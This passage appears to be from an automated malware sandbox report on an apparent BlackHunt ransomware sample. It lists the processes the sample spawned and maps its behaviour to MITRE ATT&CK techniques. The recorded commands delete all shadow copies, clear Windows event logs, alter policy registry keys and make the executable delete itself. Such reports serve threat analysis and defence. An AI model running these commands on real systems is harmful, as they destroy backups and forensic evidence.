-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:936
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:2652
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:1632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:2720
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:2084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:1432
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:2292
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:1104
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:2940
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:320
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:1320
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Modifies Internet Explorer settings
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1276
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe"2⤵
- Deletes itself
PID:2936 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2792
-
-
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2476
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2128
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
- Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
- Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
- Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1)
- Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
- Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
- Bypass User Account Control (1)
- Impair Defenses (2)
- Disable or Modify Tools (2)
- Indicator Removal (4)
- File Deletion (3)
- Modify Registry (6)
Downloads